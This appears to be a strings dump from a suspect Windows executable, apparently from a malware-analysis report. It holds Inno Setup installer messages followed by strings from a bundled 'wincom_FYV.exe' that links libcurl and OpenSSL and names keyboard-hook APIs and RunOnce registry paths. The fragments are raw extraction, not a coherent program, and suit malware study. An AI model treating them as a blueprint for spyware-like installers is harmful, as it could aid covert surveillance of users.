LoggedMsgBox returned an unexpected value. Assuming Abort.

Software\Microsoft\Windows\CurrentVersion\Uninstall\

5.5.4 (a)

URLInfoAbout

URLUpdateInfo

Creating directory: %s

Setting permissions on directory: %s

Failed to set permissions on directory (%d).

Setting NTFS compression on directory: %s

Unsetting NTFS compression on directory: %s

Failed to set NTFS compression state (%d).

IMsg

Failed to set value in Fonts registry key.

Failed to open Fonts registry key.

Setting permissions on file: %s

Failed to set permissions on file (%d).

Setting NTFS compression on file: %s

Unsetting NTFS compression on file: %s

Dest filename: %s

Dest file is protected by Windows File Protection.

Time stamp of our file: %s

Time stamp of existing file: %s

Version of our file: %u.%u.%u.%u

Version of existing file: %u.%u.%u.%u

Existing file is protected by Windows File Protection. Skipping.

Uninstaller requires administrator: %s

The existing file appears to be in use (%d). Will replace on restart.

The existing file appears to be in use (%d). Retrying.

Registering file as a font ("%s")

Cannot install files to 64-bit locations on this version of Windows

desktop.ini

.ShellClassInfo

{0AFACED1-E828-11D1-9187-B532F1E9575D}

target.lnk

Filename: %s

Desktop.ini

Software\Microsoft\Windows\CurrentVersion\App Paths\

Setting permissions on registry key: %s\%s

Could not set permissions on the registry key because it currently does not exist.

Failed to set permissions on registry key (%d).

Cannot access 64-bit registry keys on this version of Windows

Registration executable created: %s

Software\Microsoft\Windows\CurrentVersion\RunOnce

Registering 64-bit DLL/OCX: %s

Registering 32-bit DLL/OCX: %s

Registering 64-bit type library: %s

Registering 32-bit type library: %s

Directory for uninstall files: %s

Will append to existing uninstall log: %s

Will overwrite existing uninstall log: %s

Creating new uninstall log: %s

LoggedMsgBox returned an unexpected value. Assuming Cancel.

RmShutdown returned an error: %d

Fatal exception during installation process (%s):

ExtractTemporaryFile: The file "%s" was not found

ExtractTemporaryFiles: No files matching "%s" found

Invalid symbol '%s' found

Invalid token '%s' found

QuerySpawnServer: Unexpected response: $%x

CallSpawnServer: Unexpected response: $%x

CallSpawnServer: Unexpected status: %d

ShellExecuteEx

ShellExecuteEx returned hProcess=0

Wnd=$%x

FormKeyDown

PasswordCheckHash

Expression error '%s'

SuppressMsgBoxes

Cannot evaluate "%s" constant during Uninstall

Cannot access a 64-bit key in a "reg" constant on this version of Windows

Unknown custom message name "%s" in "cm" constant

srcexe

Cannot expand "pf64" constant on this version of Windows

Cannot expand "cf64" constant on this version of Windows

uninstallexe

Cannot expand "dotnet2064" constant on this version of Windows

Cannot expand "dotnet4064" constant on this version of Windows

Failed to expand shell folder constant "%s"

Unknown constant "%s"

Software\Microsoft\Windows\CurrentVersion

SOFTWARE\Microsoft\Windows NT\CurrentVersion

cmd.exe

COMMAND.COM

\_setup64.tmp

_isetup\_shfoldr.dll

Failed to get version numbers of _shfoldr.dll

shfolder.dll

Failed to load DLL "%s"

Found pending rename or delete that matches one of our files: %s

Windows version: %u.%u.%u%s (NT platform: %s)

64-bit Windows: %s

Processor architecture: %s

Defaulting to %s for suppressed message box (%s):

Message box (%s):

User chose %s.

MsgBox failed.

/SPAWNWND=$%x /NOTIFYWND=$%x

64-bit install mode: %s

Windows

_isetup\_isdecmp.dll

_isetup\_iscrypt.dll

/Password=

/SuppressMsgBoxes

/DETACHEDMSG

-0.bin

Setup version: Inno Setup version 5.5.4 (a)

Original Setup EXE:

Not restarting Windows because Setup is being run from the debugger.

Restarting Windows.

Inno Setup version 5.5.4 (a)

Portions Copyright (C) 2000-2013 Martijn Laan

hXXp://VVV.innosetup.com/

hXXp://VVV.remobjects.com/ps

Cannot run files in 64-bit locations on this version of Windows

Type: Exec

Type: ShellExec

RmRestart returned an error: %d

Need to restart Windows, not attempting to restart applications

Will not restart Windows automatically.

System\CurrentControlSet\Control\Windows

TOutputMsgWizardPage

TOutputMsgWizardPage8EH

TOutputMsgMemoWizardPage

PasswordEdit

PasswordEditLabel

MsgLabel

Msg1Label

Msg2Label

function CreateOutputMsgPage(const AfterID: Integer; const ACaption, ADescription, AMsg: String): TOutputMsgWizardPage;

function CreateOutputMsgMemoPage(const AfterID: Integer; const ACaption, ADescription, ASubCaption: String; const AMsg: AnsiString): TOutputMsgMemoWizardPage;

function MsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons: Integer): Integer;

function GetIniString(const Section, Key, Default, Filename: String): String;

function GetIniInt(const Section, Key: String; const Default, Min, Max: Longint; const Filename: String): Longint;

function GetIniBool(const Section, Key: String; const Default: Boolean; const Filename: String): Boolean;

function IniKeyExists(const Section, Key, Filename: String): Boolean;

function SetIniString(const Section, Key, Value, Filename: String): Boolean;

function SetIniInt(const Section, Key: String; const Value: Longint; const Filename: String): Boolean;

function SetIniBool(const Section, Key: String; const Value: Boolean; const Filename: String): Boolean;

procedure DeleteIniEntry(const Section, Key, Filename: String);

function GetCmdTail: String;

function StringChangeEx(var S: String; const FromStr, ToStr: String; const SupportDBCS: Boolean): Integer;

function RegValueExists(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;

function RegQueryStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;

function RegQueryMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;

function RegDeleteKeyIncludingSubkeys(const RootKey: Integer; const SubkeyName: String): Boolean;

function RegDeleteKeyIfEmpty(const RootKey: Integer; const SubkeyName: String): Boolean;

function RegKeyExists(const RootKey: Integer; const SubKeyName: String): Boolean;

function RegDeleteValue(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;

function RegGetSubkeyNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;

function RegGetValueNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;

function RegQueryDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultDWord: Cardinal): Boolean;

function RegQueryBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: AnsiString): Boolean;

function RegWriteStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;

function RegWriteExpandStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;

function RegWriteMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;

function RegWriteDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: Cardinal): Boolean;

function RegWriteBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: AnsiString): Boolean;

function CheckForMutexes(Mutexes: String): Boolean;

function Exec(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;

function ExecAsOriginalUser(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;

function ShellExec(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;

function ShellExecAsOriginalUser(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;

function MakePendingFileRenameOperationsChecksum: String;

function CreateShellLink(const Filename, Description, ShortcutTo, Parameters, WorkingDir, IconFilename: String; const IconIndex, ShowCmd: Integer): String;

function ExitSetupMsgBox: Boolean;

function GetWindowsVersion: Cardinal;

procedure GetWindowsVersionEx(var Version: TWindowsVersion);

function GetWindowsVersionString: String;

function SuppressibleMsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons, Default: Integer): Integer;

function CustomMessage(const MsgName: String): String;

function SendMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Longint;

function PostMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;

function SendNotifyMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;

function SendBroadcastMessage(const Msg, WParam, LParam: Longint): Longint;

function PostBroadcastMessage(const Msg, WParam, LParam: Longint): Boolean;

function SendBroadcastNotifyMessage(const Msg, WParam, LParam: Longint): Boolean;

procedure RaiseException(const Msg: String);

function SetPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;

Cannot call "%s" function during Setup

Cannot call "%s" function during Uninstall

Cannot call "%s" function during non Unicode Setup or Uninstall

CREATEOUTPUTMSGPAGE

CREATEOUTPUTMSGMEMOPAGE

MSGBOX

Invalid RootKey value

INIKEYEXISTS

GETCMDTAIL

REGKEYEXISTS

REGDELETEKEYINCLUDINGSUBKEYS

REGDELETEKEYIFEMPTY

REGGETSUBKEYNAMES

CHECKFORMUTEXES

SHELLEXEC

SHELLEXECASORIGINALUSER

MAKEPENDINGFILERENAMEOPERATIONSCHECKSUM

Unknown custom message name "%s"

EXITSETUPMSGBOX

GETWINDOWSVERSION

GETWINDOWSVERSIONSTRING

%u.%.2u.%u

SUPPRESSIBLEMSGBOX

%u.%u.%u.%u

Cannot disable FS redirection on this version of Windows

GetWindowsVersionEx

Runtime Error (at %d:%d):

Exception "%s" at address %p

TScriptRunner.SetPSExecParameters: Invalid type

TScriptRunner.LoadScript failed

Remove shared file %s? User chose %s%s

/INITPROCWND=$%x

/SECONDPHASE="%s" /FIRSTPHASEWND=$%x

Original Uninstall EXE:

Install was done in 64-bit mode but not running 64-bit Windows now

Removed all? %s

Not restarting Windows because Uninstall is being run from the debugger.

IMsgt

isRS-???.tmp

isRS-%.3u.tmp

DisableProcessWindowsGhosting

FTPF0P

0123456789abcdefInno Setup Setup Data (5.5.0)

Inno Setup Messages (5.5.3)

CKv.AKv

oleaut32.dll

RegQueryInfoKeyA

RegOpenKeyExA

RegEnumKeyExA

RegDeleteKeyA

RegCreateKeyExA

RegCloseKey

GetWindowsDirectoryA

CreateNamedPipeA

mpr.dll

version.dll

gdi32.dll

SetViewportOrgEx

UnhookWindowsHookEx

SetWindowsHookExA

MapVirtualKeyA

GetKeyState

GetKeyNameTextA

ExitWindowsEx

EnumWindows

EnumThreadWindows

comctl32.dll

ole32.dll

ShellExecuteExA

ShellExecuteA

comdlg32.dll

!.<*5<<<.

<<"'"'"<'"'<

.text

`.rdata

@.data

.pdata

@.rsrc

COMCTL32.dll

SHLWAPI.dll

SetProcessShutdownParameters

KERNEL32.dll

ADVAPI32.dll

SHELL32.dll

OLEAUT32.dll

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

<requestedExecutionLevel level="asInvoker" uiAccess="false"/>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>

`.data

.rsrc

@.reloc

Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

SOFTWARE\Microsoft\Windows\CurrentVersion

Software\Microsoft\Windows\CurrentVersion\ProfileReconciliation

RegKey

GetWindowsDirectoryW

RegOpenKeyA

SHFOLDER.dll

dll\shfolder.dbg

Font.Color

Font.Height

Font.Name

Font.Style

Lines.Strings

name="JR.Inno.Setup"

version="1.0.0.0"

<requestedExecutionLevel level="asInvoker" uiAccess="false"/>

<windowsSettings>

<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>

</windowsSettings>

Cannot assign a %s to a %s

Cannot create file %s

Cannot open file %s

Stream write error Out of memory while expanding memory stream*Can't write to a read-only resource stream.WriteObject called twice for the same instance

Class %s not found

Resource %s not found!Resource %s is of incorrect class

List index out of bounds Operation not allowed on sorted string list%String list does not allow duplicates

Tab index out of bounds#A component named %s already exists$''%s'' is not a valid component name

A class named %s already exists#''%s'' is not a valid integer value

Error reading %s.%s: %s

Ancestor for '%s' not found

Bitmap is empty!Cannot change the size of an icon$Unknown picture file extension (.%s)

Unsupported clipboard format

Error creating window Cannot focus a disabled or invisible window!Control '%s' has no parent window

%s property out of range

%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex2Cannot have more than one MDI form per application

Could not load CARDS.DLL

Duplicate CardId found"An error returned from DDE ($0%x)/DDE Error - conversation not established ($0%x)0Error occurred when DDE ran out of memory ($0%x)"Unable to connect DDE conversation

Grid too large for operation Too many rows or columns deleted

%s on line %d

''%s'' expected

%s expected

Invalid input value7Invalid input value. Use escape key to abandon changes

Value must be between %d and %d<Cannot create a default method name for an unnamed component

''%s'' is not a valid date

''%s'' is not a valid time#''%s'' is not a valid date and time

Invalid file name - %s

All files (*.*)|*.*

&Files: (*.*)

Invalid clipboard format Clipboard does not support Icons

Custom Colors Operation not supported on selected printer.There is no default printer currently selected

Unable to write to %s

Invalid data type for '%s'

Failed to create key %s

Failed to set data for '%s'

Failed to get data for '%s'9Synchronize called when main VCL thread in a WaitFor call0Unknown RichEdit conversion file extension (.%s)

/Menu '%s' is already being used by another form

Failed to Save Stream)StatusBar cannot have more than 64 panels!Error assigning Hot-Key to %s. %s

Hot-Key is invalid#Window is invalid or a child window%Hot-Key is assigned to another window %s is already associated with %s!'%s' is not a valid integer value('%s' is not a valid floating point value

'%s' is not a valid date

'%s' is not a valid time!'%s' is not a valid date and time

I/O error %d

Integer overflow Invalid floating point operation

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Operation aborted%Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'

Invalid variant operation"Variant method calls not supported

External exception %x

n%USERPROFILE%

r%SYSTEMROOT%

5.50.4807.2300

Microsoft(R) Windows (R) 2000 Operating System

Datos de programa%Configuraci

51.52.0.0

wincom_FYV.exe_192:

.text

`.rdata

@.data

.rsrc

@.reloc

PSShl

.tMHtJH

9>t.htb

tWSShW

tl9_ tgSSh

u$SShe

t'SShl

SSSSh

j%XtL9E

tAHt.HHt

<SShG

FtPW

SSh@B

FTCP

s%j.Zf

xSSSh

FTPjKS

FtPj;S

C.PjRV

8Y%u-

>.uEV

SS S!"SS#$SSSS%&'SSS(S)*S SSS,-.SS/0123SSSS4S5SSSSSSS6SSSSSS789:;<SSSSSSSS=SSS>?@ABCDESSSSFSSSSGHSSSSSISSJKSSSSSLMSSSNOSSPSSSSSSSSSQSSR

!"EEE#E$Eî&E'()EEEE*EEEEEEEE EEEEEEEEEEEE,EE-.EEEEEEEEEEE/E0EEEEEEEEEEEEEE12EE345EE6789:EEEEEEEE;<EE=>?EE@EEEEEABCEEEEED|

u.jhj

FTPG

FTPj

.EKSWU

|$@3|$<3

Camellia for x86 by <appro@openssl.org>

6-9'6-9'

$6.:$6.:

*?#1*?#1

>8$4,8$4,

AES for x86, CRYPTOGAMS by <appro@openssl.org>

RC4 for x86, CRYPTOGAMS by <appro@openssl.org>

SHA1 block transform for x86, CRYPTOGAMS by <appro@openssl.org>

SHA256 block transform for x86, CRYPTOGAMS by <appro@openssl.org>

DlSHA512 block transform for x86, CRYPTOGAMS by <appro@openssl.org>

Montgomery Multiplication for x86, CRYPTOGAMS by <appro@openssl.org>

FtPS

CB_ColorKey

CB_Keydown

CB_Keyup

()$^.* ?[]|\-{},:=!

CNotSupportedException

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

CCmdTarget

RegDeleteKeyExW

CMDITabProxyWnd

CMDIChildWndEx

CMDIFrameWndEx

CMDIChildWnd

CMDIFrameWnd

CMDIClientAreaWnd

CMFCToolBarsKeyboardPropertyPage

operator

GetProcessWindowStation

portuguese-brazilian

F%D,3

dbghelp.dll

%Y-%m-%dT%H:%M:%SZ

Could not resolve %s: %s; %s

getaddrinfo() failed for %s:%d; %s

init_resolve_thread() failed for %s; %s

%s:%d

Connected to %s (%s) port %ld (#%ld)

User-Agent: %s

About to connect() to %s%s port %ld (#%ld)

Re-using existing connection! (#%ld) with host %s

%s://%s

<url> malformed

:]://%[^

[^:]:%[^

Protocol %s not supported or disabled in libcurl

http_proxy

%5[^:@]:%5[^@]

:%5[^@]

Port number too large: %lu

%s://%s%s%s:%hu%s%s%s

;type=%c

[%*45[0123456789abcdefABCDEF:.]%c

Couldn't find host %s in the _netrc file; using defaults

PTF@example.com

Couldn't resolve proxy '%s'

Couldn't resolve host '%s'

IDN support not present, can't parse Unicode domains

Connection #%ld to host %s left intact

operation aborted by callback

ioctl callback returned error %d

the ioctl callback returned %d

seek callback returned error %d

Operation timed out after %ld milliseconds with %lld bytes received

Operation timed out after %ld milliseconds with %lld out of %lld bytes received

Unrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.

Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld

Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)

Problem (%d) in the Chunked-Encoded data

HTTP server doesn't seem to support byte ranges. Cannot resume.

Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)

Rewinding stream by : %zd bytes on url %s (zero-length body)

No URL set!

Added %s:%d:%s to DNS cache

Resolve %s found illegal!

%5[^:]:%d:%5s

Disables POST, goes with %s

Violate RFC 2616/10.3.3 and switch from POST to GET

Violate RFC 2616/10.3.2 and switch from POST to GET

Issue another request to this URL: '%s'

[^?&/:]://%c

unspecified error %d

%s cookie %s="%s" for domain %s, path %s, expire %lld

#HttpOnly_

skipped cookie with bad tailmatch domain: %s

skipped cookie with illegal dotcount domain: %s

httponly

23[^;

=]=I99[^;

%s%s%s

WARNING: failed to save cookies in %s

# Fatal libcurl error

# Netscape HTTP Cookie File

# hXXp://curl.haxx.se/rfc/cookie_spec.html

# This file was generated by libcurl! Edit at your own risk.

Send failure: %s

Recv failure: %s

[%s %s %s]

ssloc inet_ntop() failed with errno %d: %s

ssrem inet_ntop() failed with errno %d: %s

getsockname() failed with errno %d: %s

getpeername() failed with errno %d: %s

Failed to connect to %s: %s

Trying %s...

sa_addr inet_ntop() failed with errno %d: %s

bind failed with errno %d: %s

Bind to local port %hu failed, trying next

Local port: %hu

Couldn't bind to '%s'

Name '%s' family %i resolved to '%s' family %i

Local Interface %s is ip %s using address family %i

TCP_NODELAY set

Could not set TCP_NODELAY: %s

Unable to parse FTP file list

Error in the SSH layer

Caller must register CURLOPT_CONV_ callback options

TFTP: No such user

TFTP: Unknown transfer ID

TFTP: Illegal operation

TFTP: Access Violation

TFTP: File Not Found

Login denied

Issuer check against peer certificate failed

Invalid LDAP URL

Unrecognized or bad HTTP Content or Transfer-Encoding

Problem with the SSL CA cert (path? access rights?)

Peer certificate cannot be authenticated with given CA certificates

Problem with the local SSL certificate

SSL peer certificate or SSH remote key was not OK

An unknown option was passed in to libcurl

A libcurl function was given a bad argument

Operation was aborted by an application callback

FTP: command REST failed

FTP: command PORT failed

HTTP response code said error

FTP: couldn't retrieve (RETR failed) the specified file

FTP: couldn't set file type

FTP: can't figure out the host in the PASV response

FTP: unknown 227 response format

FTP: unknown PASV reply

FTP: unknown PASS reply

FTP: The server did not accept the PRET command.

FTP: weird server reply

A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.

URL using bad/illegal format or missing URL

Unsupported protocol

Unknown error %d (%#x)

Winsock version not supported

Protocol family not supported

Address family not supported

Operation not supported

Socket is unsupported

Protocol is unsupported

Protocol option is unsupported

Internal error removing splay node = %d

Internal error clearing splay node = %d

0123456789

libcurl is now using a weak random seed!

SSL Engine not supported

select/poll on SSL socket, errno: %d

SSL read: %s, errno %d

SSL: SSL_set_fd failed: %s

SSL: SSL_set_session failed: %s

CRLfile: %s

error loading CRL file: %s

CAfile: %s

CApath: %s

successfully set certificate verify locations:

error setting certificate verify locations, continuing anyway:

error setting certificate verify locations:

SSL: couldn't create a context: %s

Private key does not match the certificate public key

not supported file type for private key

file type P12 for private key not supported

file type ENG for private key not supported

unable to set private key file: '%s' type %s

not supported file type '%s' for certificate

file type P12 for certificate not supported

file type ENG for certificate not implemented

unable to use client certificate (no key found or wrong pass phrase?)

SSLv%c, %s%s (%d):

CERT verify

Client key exchange

Server key exchange

CERT

Client CERT

Request CERT

Client key

SSL connection using %s

Unknown SSL protocol error in connection to %s:%ld

SSL certificate problem, verify that the CA cert is OK. Details:

SSL certificate verify ok.

SSL certificate verify result: %s (%ld), continuing anyway.

SSL certificate verify result: %s (%ld)

SSL certificate issuer check ok (%s)

SSL: Certificate issuer check failed (%s)

SSL: Unable to read issuer cert (%s)

SSL: Unable to open issuer cert (%s)

issuer: %s

expire date: %s

start date: %s

subject: %s

Server certificate:

SSL: couldn't get peer certificate!

d-d-d d:d:d %s

common name: %s (matched)

common name: %s (does not match '%s')

SSL: certificate subject name '%s' does not match target host name '%s'

SSL: unable to obtain common name from peer certificate

SSL: illegal cert name field

subjectAltName does not match %s

subjectAltName: %s matched

pub_key

priv_key

RSA Public Key

RSA Public Key (%d bits)

Unable to load public key

Public Key Algorithm

Public Key Algorithm: %s

Expire date: %s

Start date: %s

Signature Algorithm: %s

Serial Number: %s

x%c

Issuer: %s

- Subject: %s

--- Certificate chain

%s: %s

x:

%s(%s)

%s: %s

Signature: %s

Cert

SSL_write() return error %d

SSL_write() error: %s

SSL_write() returned SYSCALL, errno = %d

%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s

--:--:--

%d.%d.%d.%d

%s%s%s%s%s%s

Session: %s

%s %s RTSP/1.0

Range: %s

Referer: %s

Accept-Encoding: %s

Refusing to issue an RTSP SETUP without a Transport: header.

Transport: %s

Transport:

Refusing to issue an RTSP request [%s] without a session ID.

Got RTSP Session ID Line [%s], but wanted ID [%s]

Unable to read the CSeq header: [%s]

SMTPS

SMTP

LOGIN

Got unexpected smtp-server response: %d

EHLO %s

STARTTLS denied. %c

AUTH %s

AUTH %s %s

No known auth mechanisms supported!

Access denied: %d

HELO %s

%s xxxxxxxxxxxxxxxx

Authentication failed: %d

RCPT TO:<%s>

RCPT TO:%s

MAIL FROM:<%s>

MAIL FROM:%s

USER %s

PASS %s

Access denied. %c

Invalid message. %c

RETR %s

LIST %s

%s STARTTLS

%s LOGIN %s %s

%s FETCH 1 BODY[TEXT]

%s LOGOUT

%s SELECT %s

TFTP

bind() failed; %s

set timeouts for state %d; Total %ld, retry %d maxtry %d

TFTP response timeout

TFTP finished

tftp_send_first: internal error

%s%c%s%c

tftp_rx: internal error

Timeout waiting for block %d ACK. Retries = %d

tftp_rx: giving up waiting for block %d

Received unexpected DATA packet block %d

tftp_tx: internal error, event: %i

tftp_tx: giving up waiting for block %d ack

Received ACK for block %d, expecting %d

invalid tsize -:%s:- value in OACK packet

%s (%ld)

%s (%d) %s (%d)

blksize is smaller than min supported

%s (%d)

blksize is larger than max supported

got option=(%s) value=(%s)

Couldn't open file %s

Last-Modified: %s, d %s M d:d:d GMT

Can't get the size of %s

Can't open %s for writing

There are more than %d entries

LDAP remote: %s

LDAP local: ldap_simple_bind_s %s

LDAP local: Cannot connect to %s:%hu

LDAP local: trying to establish %s connection

LDAP local: %s

LDAP local: LDAP Vendor = %s ; LDAP Version = %d

CLIENT libcurl 7.22.0

DEFINE %s %s

MATCH %s %s %s

FreeLibrary(wsock2) failed (%d)

WSACloseEvent failed (%d)

WSAEnumNetworkEvents failed (%d)

WSACreateEvent failed (%d)

failed to find WSAEnumNetworkEvents function (%d)

failed to find WSAEventSelect function (%d)

failed to find WSACloseEvent function (%d)

failed to find WSACreateEvent function (%d)

failed to load WS2_32.DLL (%d)

WS2_32.DLL

insufficient winsock version to support telnet

WSAStartup failed (%d)

Sending data failed (%d)

%s %d %d

%s %s %d

%s %s %s

%s IAC %d

%s IAC %s

Syntax error in telnet option: %s

Unknown telnet option %s

7[^= ]%*[ =]%5s

USER,%s

%c%s%c%s

7[^,],7s

%c%c%c%c

%c%c%c%c%s%c%c

%d (unknown)

%s (unsupported)

%s IAC SB

FTPS

PORT

FTP response aborted due to select/poll error: %d

FTP response timeout

PRET command not accepted: d

Failed to MKD dir: d

CWD %s

MKD %s

QUOT command failed with d

Entry path is '%s'

PROT %c

unsupported parameter to CURLOPT_FTPSSLAUTH: %d

Got a d ftp-server response when 220 was expected

Connect data stream passively

MDTM %s

SIZE %s

REST %d

PRET RETR %s

PRET STOR %s

PRET %s

%s %s

,%d,%d

%s |%d|%s|%hu|

bind() failed, we ran out of ports!

bind(port=%hu) failed: %s

socket failure: %s

Curl_resolv failed, we can not recover!

getsockname() failed: %s

STOR %s

APPE %s

Can't resolve new host %s:%hu

Can't resolve proxy host %s:%hu

Bad PASV/EPSV response: d

Skips %d.%d.%d.%d for data connection, uses %s instead

%d,%d,%d,%d,%d,%d

%c%c%c%u%c

Failed to do PORT

unsupported MDTM reply format

ddd d:d:d GMT

dddddd

Got a d response code instead of the assumed 200

ftp server doesn't support SIZE

Failed FTP upload: 

RETR response: d

Access denied: d

ACCT %s

PBSZ %d

ACCT rejected by server: d

server did not report OK, got %d

Remembering we are in dir "%s"

QUOT string not accepted: %s

TYPE %c

Connecting to %s (%s) port %d

Wildcard - "%s" skipped by user

Wildcard - START of "%s"

Uploading to a URL without a file name!

HTTPS

The requested URL returned error: %d

%s auth using %s with user '%s'

%sAuthorization: Basic %s

%s:%s

Last-Modified: %s

If-Unmodified-Since: %s

If-Modified-Since: %s

%s, d %s M d:d:d GMT

Failed sending HTTP request

Failed sending HTTP POST request

Content-Type: application/x-www-form-urlencoded

Internal HTTP POST error!

%s%s=%s

%s HTTP/%s

%s%s%s%s%s%s%s%s%s%s%s

PTF://%s:%s@%s

Content-Range: bytes %s/%lld

Content-Range: bytes %s%lld/%lld

Range: bytes=%s

PTF://

Host: %s%s%s:%hu

Host: %s%s%s

Chunky upload is not supported by HTTP 1.0

%s, TE

HTTP/1.0 connection set to keep alive!

HTTP/1.1 proxy connection set close!

HTTP/1.0 proxy connection set to keep alive!

HTTP 1.0, assume close after body

RTSP/%d.%d =

HTTP =

HTTP/%d.%d =

HTTP error before end of send, stop sending

HTTP/

Avoided giant realloc for header (max is %d)!

%s, algorithm="%s"

%s, opaque="%s"

%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"

%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop="%s", response="%s"

%s:%s:x:%s:%s:%s

%s:%.*s

%s:%s:%s

Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds

%sAuthorization: NTLM %s

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.

SOCKS4%s request granted.

Failed to resolve "%s" for SOCKS4 connect.

Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)

Failed to resolve "%s" for SOCKS5 connect.

No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)

SOCKS5 GSSAPI per-message authentication is not supported.

User was rejected by the SOCKS5 server (%d %d).

password

login

1.2.5

Error while processing content unencoding: %s

1.2.0.4

d:d

d:d:d

Received HTTP code %d from proxy after CONNECT

HTTP/1.%d %d

CONNECT %s:%hu HTTP/%s

%s%s%s%s

Host: %s

%s:%hu

Establish HTTP proxy tunnel to %s:%hu

%c%c%c=

%c%c==

0123456789-

.jpeg

.html

--%s--

couldn't open file "%s"

Content-Type: %s

; filename="%s"

Content-Disposition: attachment; filename="%s"

Content-Type: multipart/mixed, boundary=%s

%s; boundary=%s

NTLMSSP%c

%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%s%s

%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c

KGS!@#$%.rnd

passed a null parameter

DSO support routines

x509 certificate routines

error:lX:%s:%s:%s

X.509 part of OpenSSL 1.0.0e 6 Sep 2011

OPENSSL_ALLOW_PROXY_CERTS

\X

unsupported or invalid name syntax

unsupported or invalid name constraint syntax

unsupported name constraint type

name constraints minimum and maximum not supported

Unsupported extension feature

invalid or inconsistent certificate policy extension

invalid or inconsistent certificate extension

key usage does not include digital signature

key usage does not include CRL signing

unable to get CRL issuer certificate

key usage does not include certificate signing

authority and subject key identifier mismatch

certificate rejected

certificate not trusted

unsupported certificate purpose

proxy certificates not allowed, please set the appropriate flag

invalid non-CA certificate (has CA markings)

invalid CA certificate

certificate revoked

certificate chain too long

unable to verify the first certificate

unable to get local issuer certificate

self signed certificate in certificate chain

self signed certificate

format error in certificate's notAfter field

format error in certificate's notBefore field

certificate has expired

certificate is not yet valid

certificate signature failure

unable to decode issuer public key

unable to decrypt certificate's signature

unable to get certificate CRL

unable to get issuer certificate

CERTIFICATE

cert_info

ASN.1 part of OpenSSL 1.0.0e 6 Sep 2011

d.registeredID

d.iPAddress

d.uniformResourceIdentifier

d.ediPartyName

d.directoryName

d.dNSName

d.rfc822Name

d.otherName

Stack part of OpenSSL 1.0.0e 6 Sep 2011

Big Number part of OpenSSL 1.0.0e 6 Sep 2011

x%s

%s - d:d:d%.*s %d%s

%*s<Not Supported>

%*s%s

%*s%s:

OpenSSL 1.0.0e 6 Sep 2011

MD5 part of OpenSSL 1.0.0e 6 Sep 2011

libdes part of OpenSSL 1.0.0e 6 Sep 2011

DES part of OpenSSL 1.0.0e 6 Sep 2011

MD4 part of OpenSSL 1.0.0e 6 Sep 2011

RAND part of OpenSSL 1.0.0e 6 Sep 2011

You need to read the OpenSSL FAQ, hXXp://VVV.openssl.org/support/faq.html

ssl_sess_cert

ssl_cert

evp_pkey

